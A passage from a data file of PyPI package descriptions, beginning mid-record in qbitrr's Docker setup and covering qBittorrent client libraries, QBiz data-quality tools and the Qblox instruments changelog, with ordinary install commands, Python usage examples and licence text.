onDockerHuborGithubDocker Rundockerrun-d\\--name=qbitrr\\-eTZ=Europe/London\\-v/etc/localtime:/etc/localtime:ro\\-v/path/to/appdata/qbitrr:/config\\-v/path/to/completed/downloads/folder:/completed_downloads:rw\\--restartunless-stopped\\feramance/qbitrr:latestDocker Composeversion:\"3\"services:qbitrr:image:feramance/qbitrr:latestuser:1000:1000# Required to ensure the container is run as the user who has perms to see the 2 mount points and the ability to write to the CompletedDownloadFolder mounttty:true# Ensure the output of docker-compose logs qBitrr are properly colored.restart:unless-stopped# networks: This container MUST share a network with your Sonarr/Radarr instancesenvironment:-TZ=Europe/Londonvolumes:-/etc/localtime:/etc/localtime:ro-/path/to/appdata/qbitrr:/config# Config folder for qBitrr-/path/to/completed/downloads/folder:/completed_downloads:rw# The script will ALWAYS require write permission in this folder if mounted, this folder is used to monitor completed downloads and if not present will cause the script to ignore downloaded file monitoring.# Now just to make sure it is clean, when using this script in a docker you will need to ensure you config.toml values reflect the mounted folders.# The same would apply to Settings.CompletedDownloadFolder# e.g CompletedDownloadFolder = /completed_downloads/folder/in/containerlogging:# this script will generate a LOT of logs - so it is up to you to decide how much of it you want to storedriver:\"json-file\"options:max-size:\"50m\"max-file:3depends_on:# Not needed but this ensures qBitrr only starts if the dependencies are up and running-qbittorrent-radarr-1080p-radarr-4k-sonarr-1080p-sonarr-anime-overseerr-ombiImportant mentions for dockerThe script will always expect a completed config.toml fileWhen you first start the container a \"config.rename_me.toml\" will be added to/path/to/appdata/qbitrrMake sure to rename it to 'config.toml' then edit it to your desired valuesFeature SuggestionsPlease do not hesitate to open an issue for feature requests or any suggestions you may have. I plan on periodically adding any features I might feel I want to add but welcome to other suggestions I might not have thought of yet.Reporting an IssueWhen reporting an issue, please ensure that log files are enabled while running qBitrr and attach them to the issue. Thank you."} +{"package": "qbittorrent", "pacakge-description": "Python wrapper for QBittorrent web api v3.1.x"} +{"package": "qbittorrent-api", "pacakge-description": "qBittorrent Web API ClientPython client implementation for qBittorrent Web APICurrently supports qBittorrentv4.6.3(Web API v2.9.3) released on January 14, 2024.User Guide and API Reference available onRead the Docs.FeaturesThe entire qBittorrentWeb APIis implemented.qBittorrent version checking for an endpoint's existence/features is automatically handled.If the authentication cookie expires, a new one is automatically requested in line with any API call.InstallationInstall via pip fromPyPIpython-mpipinstallqbittorrent-apiGetting Startedimportqbittorrentapi# instantiate a Client using the appropriate WebUI configurationconn_info=dict(host=\"localhost\",port=8080,username=\"admin\",password=\"adminadmin\",)qbt_client=qbittorrentapi.Client(**conn_info)# the Client will automatically acquire/maintain a logged-in state# in line with any request. therefore, this is not strictly necessary;# however, you may want to test the provided login credentials.try:qbt_client.auth_log_in()exceptqbittorrentapi.LoginFailedase:print(e)# if the Client will not be long-lived or many Clients may be created# in a relatively short amount of time, be sure to log out:qbt_client.auth_log_out()# or use a context manager:withqbittorrentapi.Client(**conn_info)asqbt_client:ifqbt_client.torrents_add(urls=\"...\")!=\"Ok.\":raiseException(\"Failed to add torrent.\")# display qBittorrent infoprint(f\"qBittorrent:{qbt_client.app.version}\")print(f\"qBittorrent Web API:{qbt_client.app.web_api_version}\")fork,vinqbt_client.app.build_info.items():print(f\"{k}:{v}\")# retrieve and show all torrentsfortorrentinqbt_client.torrents_info():print(f\"{torrent.hash[-6:]}:{torrent.name}({torrent.state})\")# pause all torrentsqbt_client.torrents.pause.all()Change Logv2024.2.59 (25 feb 2024)Allow added RSS feeds without a name/path to default to the name in the feed (#423)Advertise support for Python 3.13 (#349)v2024.1.58 (16 jan 2024)Advertise support for qBittorrent v4.6.3v2023.11.57 (27 nov 2023)Advertise support for qBittorrent v4.6.2v2023.11.56 (20 nov 2023)Advertise support for qBittorrent v4.6.1Add support fortorrents/count(#366)v2023.11.55 (6 nov 2023)Remove Python 2 platform tag from published wheel (#369)v2023.10.54 (22 oct 2023)Advertise support for qBittorrent v4.6.0Dropped support for legacy Python versions; Python 3.8+ is supported (#333)Refactored typing from stub files in to source (#345)Dropped support for API method argumentshashandhashes; usetorrent_hashandtorrent_hashes, respectively (#345)For example, replaceclient.torrents_info(hashes=\"...\")withclient.torrents_info(torrent_hashes=\"...\")v2023.9.53 (7 sept 2023)Advertise support for Python 3.12Advertise support for qBittorrent v4.5.5Addinactive_seeding_time_limitfortorrents/setShareLimits(#271)Implementapp/networkInterfaceListandapp/networkInterfaceAddressList(#272)v2023.7.52 (13 jul 2023)Ensure the wheel is uploaded with the release to PyPIv2023.7.51 (13 jul 2023)ConvertAPINamesandTorrentStatustoStrEnumandTrackerStatustoIntEnum(#267)v2023.6.50 (19 jun 2023)Advertise support for qBittorrent v4.5.4v2023.6.49 (9 jun 2023)TheClientis no longer binded toLists (#230)This does not affect normal operation but allows for slicing, adding, and copyingListsv2023.5.48 (29 may 2023)Advertise support for qBittorrent v4.5.3v2023.4.47 (19 apr 2023)Clientcan now be used as a context managerv2023.4.46 (14 apr 2023)Fix building docs after implementingsrc-layoutv2023.4.45 (11 apr 2023)Add theTrackerStatusEnum to identify tracker statuses fromtorrents/trackersv2023.3.44 (09 mar 2023)Add support for torrent status filtersseeding,moving,errored, andcheckingv2023.2.43 (27 feb 2023)Advertise support for qBittorrent v4.5.2v2023.2.42 (13 feb 2023)Advertise support for qBittorrent v4.5.1v2023.2.41 (8 feb 2023)Remove dependence on qBittorrent authentication cookie being namedSIDMinor typing fixesv2022.11.40 (27 nov 2022)Support qBittorrent v4.5.0 releaseAdd support fortorrents/exportImplement newtransfer/setSpeedLimitsModein place of existingtransfer/toggleSpeedLimitsModeAdd support forstopConditionintorrents/addUpdate typing to be complete, accurate, and shipped with the packagev2022.10.39 (26 oct 2022)Advertise support for Python 3.11v2022.8.38 (31 aug 2022)Advertise support for qBittorrent v4.4.5v2022.8.37 (24 aug 2022)Advertise support for qBittorrent v4.4.4v2022.8.36 (15 aug 2022)Comply with enforced HTTP method requirements from qBittorrentv2022.8.35 (13 aug 2022)RemovePYTHON_prefix for configuration environment variablesv2022.8.34 (11 aug 2022)Addsetuptoolsas an explicit dependency forpkg_resources.parse_version()v2022.7.33 (27 jul 2022)Reorder class hierarchy to allow independent MixIn useClean up typing annotationsOptimize Dictionary and List initializationsRename Alias decorator to alias for better conformityv2022.5.32 (30 may 2022)Implement pre-commit checksAdvertise support for qBittorrent v4.4.3.1v2022.5.31 (24 may 2022)Advertise support for qBittorrent v4.4.3Revamp GitHub CIReorgRequestfor some more clarity (hopefully)v2022.4.30 (3 apr 2022)Stop advertising support for Python 3.6 (EOL 12/2021)Publish to PyPI using API token and cleanup GitHub Action scriptsv2022.3.29 (25 mar 2022)Advertise support for qBittorrent v4.4.2v2022.2.28 (17 feb 2022)Advertise support for qBittorrent v4.4.1qBittorrent reverted the category dictionary keysavePathback tosave_pathv2022.1.27 (9 jan 2022)Support for qBittorrent v4.4.0torrents/inforesults can now be filtered by a torrent tagAdded new torrent state \"Forced Metadata Downloading\"Support per-torrent/per-category \"download folder\"v2021.12.26 (11 dec 2021)Stop sendingOriginandRefererheaders (Fixes #63)v2021.12.25 (10 dec 2021)Close files that are opened and sent to Requests when adding torrents from filesEnable warnings for tests and explicitly close Requests Sessions to prevent (mostly spurious) ResourceWarningsv2021.12.24 (3 dec 2021)Add Type Hints for all public and private functions, methods, and variablesSupport HTTP timeouts as well as arbitrary Requests configurationsv2021.8.23 (28 aug 2021)Advertise support for qBittorrent v4.3.8Drop support for Python 3.5v2021.5.22 (12 may 2021)Support for qBittorrent v4.3.5torrents/filesincludesindexfor each file;indexofficially replacesidbutidwill still be populatedv2021.5.21 (1 may 2021)Allow users to force a specific communications scheme withFORCE_SCHEME_FROM_HOST(fixes #54)v2021.4.20 (11 apr 2021)Add support for ratio limit and seeding time limit when adding torrentsv2021.4.19 (8 apr 2021)Update license in setup to match gpl->mit license change on GitHubv2021.3.18 (13 mar 2021)ReplaceTorrentStates.FORCE_DOWNLOAD='forceDL'withTorrentStates.FORCED_DOWNLOAD='forcedDL'v2021.2.17 (7 feb 2021)Generally refactorrequests.pyso it's better and easier to readPersist a Requests Session between API calls instead of always creating a new one...small perf benefitMove auth endpoints back to a dedicated moduleSinceattrdictis apparently going to break in Python 3.10 and it is no longer maintained, I've vendored a modified version (fixes #45)Createdhandle_hashesdecorator to hide the cruft of continuing to support hash and hashes argumentsv2021.1.16 (26 jan 2021)Support qBittorrent v4.3.3 and Web API v2.7 (...again)Newtorrents/renameFileandtorrents/renameFolderendpointsRetrieve app api version when needed instead of cachingStop verifying and removing individual parameters when they aren't supportedv2020.12.15 (27 dec 2020)Support qBittorrent v4.3.2 and Web API v2.7torrents/addsupports adding torrents with tags viatagsparameterapp/preferencessupports toggling internationalized domain name (IDN) support viaidn_support_enabledBREAKING CHANGE: fortorrents/add,is_root_folder(orroot_folder) is superseded bycontent_layoutFortorrents/delete,delete_filesnow defaults toFalseinstead of required being explicitly passedv2020.12.14 (6 dec 2020)Add support for non-standard API endpoint paths (Fixes #37)Allows users to leverage this client when qBittorrent is configured behind a reverse proxyFor instance, if the Web API is being exposed at \"http://localhost/qbt/\", then users can instantiate viaClient(host='localhost/qbt')and all API endpoint paths will be prefixed with \"/qbt\"Additionally, the scheme (i.e. http or https) from the user will now be respected as the first choice for which scheme is used to communicate with qBittorrentHowever, users still don't need to even specify a scheme; it'll be automatically determined on the first connection to qBittorrentNeither of these should be breaking changes, but if you're instantiating with an incorrect scheme or an irrelevant path, you may need to prevent doing that nowv2020.11.13 (29 nov 2020)Support qBittorrent v4.3.1 and Web API v2.6.1Path of torrent content now available viacontent_pathfromtorrents/infov2020.11.12 (16 nov 2020)Fix support for raw bytes fortorrent_filesintorrents_add()for Python 3 (Fixes #34)v2020.10.11 (29 oct 2020)Support qBittorrent v4.3.0.1 and Web API v2.6Due to qBittorrent changes,search/categoriesno longer returns anything andrss/renameRuleworks againv2020.10.10 (7 oct 2020)Advertise support for Python 3.9v2020.9.9 (12 sept 2020)Only requestenum34for Python 2v2020.8.8 (14 aug 2020)Support adding torrents from raw torrent files as bytes or file handles (Fixes #23)IntroduceTorrentStatesenum for qBittorrent list of torrent statesv2020.7.7 (26 jul 2020)Update tests and misc small fixesv2020.7.6 (25 jul 2020)Re-release of v2020.7.5v2020.7.5 (25 jul 2020)Add RTD documentationv2020.6.4 (9 jun 2020)Bug fix release. Reorganized code and classes to be more logicalStarted returning None from many methods that were returning Requests ResponsesContent-Length header is now explicitly sent as \"0\" for any POSTs without a bodyEndpoint input parametershashandhashesare renamed totorrent_hashandtorrent_hashes.hashandhashesremain supportedsearch_uninstall_pluginnow works. search_enable_plugin now supports multiple pluginsTorrent.download_limitnow only return the value instead of a dictionary.Torrent.upload_limitnow worksDrop advertising Python 2.6 and 3.4 support; add PyPy3 supportImplement test suite and CI that can test all supported qBittorrent versions on all pythonsv2020.5.3 (11 may 2020)Include currently supported qBittorrent version in README (Fixes #11)v2020.4.2 (25 apr 2020)Add support forrss/markAsReadandrss/matchingArticles. Added in v2.5.1 (Fixes #10)v2020.4.1 (25 apr 2020)Addstalled(),stalled_uploading(), andstalled_downloading()totorrents.infointeraction; added in Web API v2.4.1Implement torrent file renaming. Added in Web API v2.4.0 (Fixes #3)Since versioning was botched last release, implement calendar versioningList of files returned fromtorrents_files()now contains file ID inidv6.0.0 (22 apr 2020)Performance gains for responses with payloads...especially for large payloadsFixes #6. Adds support forSIMPLE_RESPONSESfor the entire client and individual methodsv0.5.2 (19 apr 2020)Fixes #8. Remove whitespace from in setPreferences requests for older qBittorrent versionsv0.5.1 (2 jan 2020)Add Python3.8 version for PyPIMove project from beta to stable for PyPIv0.5.0 (2 jan 2020)Make Web API URL derivation more robust...thereby allowing the client to actually work on Python3.8 (#5)Allow port to be discretely specified during Client instantiation (#4)Enhance request retry logic and expose retry configurationv0.4.2 (5 dec 2019)Improve organization and clarity of READMEBetter document exceptionsClarify torrent file handling exceptions better with proper exceptionsClean up the request wrapper exception handlingFix HTTP 404 handling to find and return problematic torrent hashesv0.4.1 (4 dec 2019)Round out support for tags with qBittorrent v4.2.0 releaseRemove upper-bound version requirements forrequestsandurllib3v0.4 (4 dec 2019)Support for qBittorrent v4.2.0 releaseAdd support forapp/buildInfoAdd support fortransfer/banPeersandtorrents/addPeersAdd support fortorrents/addTags,torrents/removeTags,torrents/tags,torrents/createTags, andtorrents/deleteTagsv0.3.3 (29 sept 2019)Fix useAutoTMM to autoTMM forclient.torrents_add()so auto torrent management worksAdd support to refresh RSS items introduced in qBittorrent v4.1.8v0.3.2 (28 jun 2019)Restore python 2 compatibilityAllow exceptions to be imported directly from package instead of only exceptions modulev0.3 (1 jun 2019)Finalized interaction layer interfacesv0.2 (13 may 2019)Introduced the \"interaction layer\" for transparent interaction with the qBittorrent APIv0.1 (7 may 2019)Complete implementation of qBittorrent WebUI API 2.2Each API endpoint is available via theClientclassAutomatic re-login is supported in the event of login expirationMIT LicenseCopyright (c) Russell MartinPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qbittorrentrpc", "pacakge-description": "qbittorrentrpcSimple qbittorrent HTTP-RPC client.HierarchyExamplepythonSeetest."} +{"package": "qbittorrentui", "pacakge-description": "qBittorrenTUIConsole UI for qBittorrent. Not feature-complete but is usable for low volume and everyday torrenting.Key MapAny Windowq : exitn : open connection dialogTorrent List Windowa : open add torrent dialogenter : open context menu for selected torrentright arrow: open Torrent WindowTorrent Windowleft : return to Torrent Listesc : return to Torrent ListContententer : bump priorityspace : bump priorityInstallationInstall from pypi:pipinstallqbittorrentuiIn most cases, this should allow you to run the application simply with theqbittorrentuicommand. Alternatively, you can specify a specific python binary with./venv/bin/python -m qbittorrentuior similar.ConfigurationConnections can be pre-defined within a configuration file (modeled after default.ini). Specify the configuration file using --config_file. Each section in the file will be presented as a separate instance to connect to.Sample configuration file section:[localhost:8080]\nHOST = localhost\nPORT = 8080\nUSERNAME = admin\nPASSWORD = adminadmin\nCONNECT_AUTOMATICALLY = 1\nTIME_AFTER_CONNECTION_FAILURE_THAT_CONNECTION_IS_CONSIDERED_LOST = 5\nTORRENT_CONTENT_MAX_FILENAME_LENGTH = 75\nTORRENT_LIST_MAX_TORRENT_NAME_LENGTH = 60\nTORRENT_LIST_PROGRESS_BAR_LENGTH = 40\nDO_NOT_VERIFY_WEBUI_CERTIFICATE = 1Only HOST, USERNAME, AND PASSWORD are required.\nDO_NOT_VERIFY_WEBUI_CERTIFICATE is necessary if the certificate is untrusted (e.g. self-signed).TODO/WishlistApplicationFigure out the theme(s)Configuration for connectionsLog/activity output (likely above status bar)Implement window for editing qBittorrent settingsTorrent List WindowTorrent sortingAdditional torrent filtering mechanismsTorrent searchingTorrent status icon in torrent nameTorrent name color codingTorrent list column configurationTorrent WindowMake focus more obvious when switching between tabs list and a displayScrollbar in the displaysSpeed graph displayTorrent Window Content DisplayLeft key should return to tab listMIT LicenseCopyright (c) Russell MartinPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qbiz-airflow-presto", "pacakge-description": "The QBiz, inc. Airflow-Presto package provides anAirflow Operatorwhich\nis designed to run containerized Presto nodes using Amazon'sElastic Container Service. It is designed to dynamically create and destroyFargatecompute resources to minimize cost. This package does not include\nthe Docker Image nor will it attempt to create other AWS resources necessary\nlaunch ECS tasks -- although examples are provided. A Dockerfile to\nbuild your own image can be found in theQbiz Code Repository."} +{"package": "qbiz-data-raven", "pacakge-description": "qbiz-data-ravenDescriptionA toolbox of flexible database connectors and test methods used to measure data integrity of datasets and database\ntables.Build data quality tests which can be inserted into an existing Python script or run as a stand-alone script.Send outcome notifications to messaging and logging applications.Halt pipelines and raise exceptions when needed.PrerequisitesPython 3.6+sqlalchemy>=1.3.19psycopg2pymysqlInstallingpip install qbiz-data-ravenA simple data quality test scriptIn this example we build a script to test thename,priceandproduct_idcolumns from the Postgres tableOrders.\nThis table has the following DDL:create table Orders (\nid int,\nname varchar(50),\norder_ts varchar(26),\nproduct_id int,\nprice float\n);Here's the test script.import os\n\nfrom qbizdataraven.connections import PostgresConnector\nfrom qbizdataraven.data_quality_operators import SQLNullCheckOperator\n\n\ndef main():\n # initialize logging\n lazy_logger = lambda msg: print(msg + '\\n')\n\n # database connection credentials\n user = os.environ[\"user\"]\n password = os.environ[\"password\"]\n host = os.environ[\"host\"]\n dbname = os.environ[\"dbname\"]\n port = os.environ[\"port\"]\n\n # postgres database connector\n conn = PostgresConnector(user, password, host, dbname, port, logger=lazy_logger)\n dialect = \"postgres\"\n\n # test thresholds\n threshold0 = 0\n threshold1 = 0.01\n threshold5 = 0.05\n\n ##### TEST ORDERS TABLE #####\n # Table to be tested\n from_clause = \"test_schema.Orders\"\n\n # Conditional logic to be applied to input data\n date = \"2020-09-08\"\n where_clause = [f\"date(order_ts) = '{date}'\"]\n\n # Columns to be tested in target table\n columns = (\"name\", \"product_id\", \"price\")\n\n # Threshold value to be applied to each column\n threhold = {\"name\": threshold1, \"product_id\": threshold0, \"price\": threshold5}\n\n # Hard fail condition set on specific columns\n hard_fail = {\"product_id\": True}\n\n # Execute the null check test on each column in columns, on the above table\n SQLNullCheckOperator(conn, dialect, from_clause, threhold, *columns, where=where_clause, logger=lazy_logger,\n hard_fail=hard_fail)\n\n\nif __name__ == \"__main__\":\n main()DocumentationDatabase SupportPostgresMySQLData Quality TestsData quality tests are used to measure the integrity of specified columns within a table or document. Every data\nquality test will return'test_pass'or'test_fail'depending on the given measure and threshold.Data Quality OperatorsEach operator will log the test results using the function passed in theloggerparameter. If no logger is found then\nthese log messages will be swallowed.Each operator has atest_resultsattribute which exposes the results from the underlying test.test_resultsis adictobject with the following structure:{\n COLUMN NAME: {\n \"result\": 'test_pass' or 'test_fail',\n \"measure\": THE MEASURED VALUE OF COLUMN NAME,\n \"threshold\": THE THRESHOLD VALUE SPECIFIED FOR TEST,\n \"result_msg\": TEST RESULT MESSAGE\n }\n}SQL OperatorsAll SQL operators have the following required parameters:conn- The database connection object.dialect- The SQL dialect for the given database. Accepted values arepostgresormysql.from_- The schema and table name of table to be tested.threshold- The threshold specified for a given test or collection of tests. This parameter can be numeric or adictobject. Ifthresholdis numeric then this value will be applied to all columns being tested by the operator.\nIfthresholdis adictthen eachthresholdvalue will be referenced by column name. All columns being passed to the\noperator must have a specified threshold value. Ifthresholdis adictit must have the following structure:{\n COLUMN NAME: NUMERIC VALUE\n}columns- The column names entered as comma separated positional arguments.All SQL operators have the following optional parameters:logger- The logging function. If None is passed then logged messages will be swallowed.where- Conditional logic to be applied to table specified infrom_.hard_fail- Specifies if an operator which has a test which results in'test_fail'should terminate the current\nprocess. This parameter\ncan be passed as a literal or adictobject. Ifhard_failis set toTruethen every test being performed by the\ngiven operator which results in'test_fail'will terminate the current process. Ifhard_failis adictobject then\neachhard_failvalue will be referenced by column name. Only those columns with ahard_failvalue ofTruewill\nterminate the process upon test failure. Ifhard_failis adictit must have the following structure:{\n COLUMN NAME: BOOLEAN VALUE\n}use_ansi- If true then compile measure query to ANSI standards.SQLNullCheckOperator- Test the proportion of null values for each column contained incolumns.SQLDuplicateCheckOperator- Test the proportion of duplicate values for each column contained incolumns.SQLSetDuplicateCheckOperator- Test the number of duplicate values across all columns passed to thecolumnsparameter simultaniously. This measure is equivalent to counting the number of rows returned from aSELECT DISTINCTon\nall columns and dividing by the total number of rows.CSV OperatorsAll CSV operators have the following required parameters:from_- The path to CSV file to be tested.threshold- Same as defined above for SQL operators.columns- the column names entered as comma separated positional arguments.All CSV operators have the following optional parameters:delimiter- The delimiter used to separate values specified in the file refeneced by thefrom_parameter.hard_fail- Same as defined above for SQL operators.fieldnames- A sequence of all column names for CSV file specified infrom_parameter. To be used if the specified\nfile does not have column headers.reducer_kwargs- Key word arguments passed to the measure reducer function.CSVNullCheckOperator- Test the proportion ofNULLvalues for each column contained incolumns.CSVDuplicateCheckOperator- Test the proportion of duplicate values for each column contained incolumns.CSVSetDuplicateCheckOperator- Test the number of duplicate values across all columns passed to thecolumnsparameter simultaniously.Custom OperatorsCustomSQLDQOperator- Executes the test passed by thecustom_testparameter on each column contained incolumns.\nTheCustomSQLDQOperatorclass has the following required parameters:conn- The database connection object.custom_test- The SQL query to be executed. Thecustom_testquery is required to return a column labeledresultwhich takes value'test_pass'or'test_fail'. Thecustom_testquery should also return columnsmeasure, which\nprovides the measured column value, andthreshold, which gives the threshold used in the test. If these columns are\npresent then these values will be logged and returned in thetest_resultsattribute. Ifmeasureandthresholdare\nnot returned by thecustom_testquery then these values will be logged asNone, and will be given in thetest_resultsattribute asNone.custom_testcan also be a query template with placeholders{column}and{threshold}for variable column names and threshold values.description- The description of the data quality test being performed. The description is may contain\nplaceholders{column}and{threshold}for the optional parameterscolumnsandthreshold, if they are passed\nto theCustomSQLDQOperator. In this case then a test description will be generated for eachcolumnincolumnsand\nfor each value ofthreshold.TheCustomSQLDQOperatorclass has the following optional parameters:columns- a comma separated list of column arguments.threhsold- Same as defined above for SQL operators.hard_fail- Same as defined above for SQL operators.test_desc_kwargs- Key word arguments for formatting the test description."} +{"package": "qblocal-backup", "pacakge-description": "qblocal_backupa local backup tool for qbittorrent without call webui api.Usagepython -m qblocal_backup should be a directory."} +{"package": "qblox-instruments", "pacakge-description": "Welcome to Qblox InstrumentsThe Qblox instruments package contains everything to get started with Qblox instruments (i.e. Python drivers,documention and tutorials).This software is free to use under the conditions specified in thelicense.For more information, please contactsupport@qblox.com.CreditsDevelopersQblox:Jordy Gloudemans Maria Garcia Damaz de Jong Daniel Weigand Adithyan Radhakrishnan G\u00e1bor Oszk\u00e1r D\u00e9nes External:Pieter Eendebak ContributorsNone yet. Why not be the first?History0.11.2 (27-10-2023)Changelog:Added support for new cluster firmware release.API changes:Add a method to get the maximum allowed attenuation for that specific board, use it to populate the respective range of the QCoDeS parameter.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.11.1.Pulsar QRM: compatible with device firmwarev0.11.1.Cluster: compatible with device firmwarev0.6.2.Note:You can also find this release on Gitlabhere.0.11.1 (15-09-2023)Changelog:Fixed compatibility with Python 3.7Fixedqblox-pnpunder MacOSAdded support for new cluster firmware release.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.11.1.Pulsar QRM: compatible with device firmwarev0.11.1.Cluster: compatible with device firmwarev0.6.1.Note:You can also find this release on Gitlabhere.0.11.0 (27-07-2023)Changelog:Added marker inversion functionality, for changing marker default voltage level. Previously it defaulted to LOW but now\nuser can use the marker inv parameters to select default value of HIGH.Made all the SystemStatusFlags more concise.Added ability for ADC\u2019s inputs to be offset.Changed channel map to support real-mode waveform playback and make the parameters usage more intuitive.Fixed missing set/get parameters on dummy instrument.Fixed global divide-by-zero settings in numpy, moving it for local scope when is potentially possible.API changes:SystemStatusFlags regrouped PLL flags {CARRIER_PLL_UNLOCKED, FPGA_PLL_UNLOCKED, LO_PLL_UNLOCKED} -> {PLL_UNLOCKED}SystemStatusFlags regrouped Temp flags {FPGA_TEMPERATURE_OUT_OF_RANGE, CARRIER_TEMPERATURE_OUT_OF_RANGE,\nAFE_TEMPERATURE_OUT_OF_RANGE, LO_TEMPERATURE_OUT_OF_RANGE, BACKPLANE_TEMPERATURE_OUT_OF_RANGE} -> {TEMPERATURE_OUT_OF_RANGE}SystemStatusFlags added flag {HARDWARE_COMPONENT_FAILED}QCoDeS parameter added for input offset : {in0_offset_path0, in0_offset_path1, in0_offset, in1_offset}QCoDeS parameter added for marker inversion: {marker0_inv_en, marker1_inv_en, marker2_inv_en, marker3_inv_en}QCoDeS parameters changed for channel map: channel_map_pathX_outY_en -> connect_outXQCoDeS parameters added for real-mode acquisition: {connect_acq_I, connect_acq_Q}Added utility methods for configuring the channel map: {disconnect_outputs, disconnect_inputs, connect_sequencer}Addedqblox-cfg describe -j/\u2013json`to more explicitly expose the functionality currently only shown when verbosity is increasedDriver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.11.0.Pulsar QRM: compatible with device firmwarev0.11.0.Cluster: compatible with device firmwarev0.6.0.Note:You can also find this release on Gitlabhere.0.10.1 (17-07-2023)Changelog:Added support for new cluster firmware release.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.10.0.Pulsar QRM: compatible with device firmwarev0.10.0.Cluster: compatible with device firmwarev0.5.1.Note:You can also find this release on Gitlabhere.0.10.0 (01-05-2023)Changelog:Changed resolution of the sequencer\u2019s real-time timegrid from 4 ns to 1 ns for all real-time instructions, except\nfor the instructions that operate on the NCOs (e.g. set_freq, reset_ph, set_ph, set_ph_delta). For now, the NCO\ninstructions still operate on the 4 ns timegrid.Added the option to control the brightness of the front-panel LEDs. The brightness can be set to four settings:\nhigh, medium, low, off.Added a sequencer flag to indicate that input was out-of-range during an acquisition\u2019s integration window.\nPreviously, the input out-of-range could only be detected by scope acquisitions. Now all acquisitions are able to\ndetect this.Changed the format with which sequencer and scope configurations are communicated between the instrument and\ndriver to JSON objects as a first step towards improving driver backwards compatibility.Improved handling of acquisitions in the dummy drivers.Added more detail to the HISTORY file.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.10.0.Pulsar QRM: compatible with device firmwarev0.10.0.Cluster: compatible with device firmwarev0.5.0.Note:You can also find this release on Gitlabhere.0.9.0 (28-02-2023)Changelog:Added new feedback functionality to allow sequencer-to-sequencer, module-to-module and Cluster-to-Cluster feedback.\nTo support this, new Q1ASM instructions are added to the instruction set. The wait_trigger instruction is also\nchanged accordingly with a new address argument.The external trigger input is now also connected to the new trigger network for feedback purposes and must be mapped\nto this network using the associated parameters.QCoDeS parameter name change: discretization_threshold_acq -> thresholded_acq_thresholdQCoDeS parameter name change: phase_rotation_acq -> thresholded_acq_rotationImproved performance of the get_acquisitions method.Fixed ability to exclude sequencer.sequence readout when creating a snapshot through QCoDeS.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.9.0.Pulsar QRM: compatible with device firmwarev0.9.0.Cluster: compatible with device firmwarev0.4.0.Note:You can also find this release on Gitlabhere.0.8.2 (27-01-2023)Changelog:Add compatibility for Cluster release v0.3.1Improved scope mode data handling.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.8.0.Pulsar QRM: compatible with device firmwarev0.8.0.Cluster: compatible with device firmwarev0.3.1.Note:You can also find this release on Gitlabhere.0.8.1 (19-12-2022)Changelog:Removed Read the Docs files from repository and moved it tohttps://gitlab.com/qblox/packages/software/qblox_instruments_docs.Improved performance of the get_acquisitions method.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.8.0.Pulsar QRM: compatible with device firmwarev0.8.0.Cluster: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.8.0 (09-12-2022)Changelog:Added support for the redesigned NCO.Added support for the NCO phase compensation for propagation delays from output to input path.Increased NCO range from +/-300 MHz to +/-500 MHz.Added support for TTL trigger acqusitions.Improved error handling for sequence retrieval.Added support for attenuation control to dummy modules.Added support to set acquisition data in dummy modules.Updated the assemblers used by the dummy modules.Added and updated test cases for new features.Added NCO control tutorial notebook.Added TTL trigger acquisition tutorial notebook.Improved doc-strings.Updated documentation and tutorials.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.8.0.Pulsar QRM: compatible with device firmwarev0.8.0.Cluster: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.7.1 (23-01-2023)Changelog:Added support for new firmware release.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.7.3.Pulsar QRM: compatible with device firmwarev0.7.3.Cluster: compatible with device firmwarev0.2.3.Note:You can also find this release on Gitlabhere.0.7.0 (04-08-2022)Changelog:Added command clear acquisition dataSPI Rack driver was updated to always unlock it at startup, not initialize the span by default, change the code for\nchanging the span of the S4g and D5a and ensure no mismatch between the host computer and SPI rack on the span\nvalue before doing a current/voltage set operation.Changed assembler character limit, and add code to strip the sequencer program from comments and unused information.Updated tutorials to make them independent of the device type (ie QRM or QCM) and 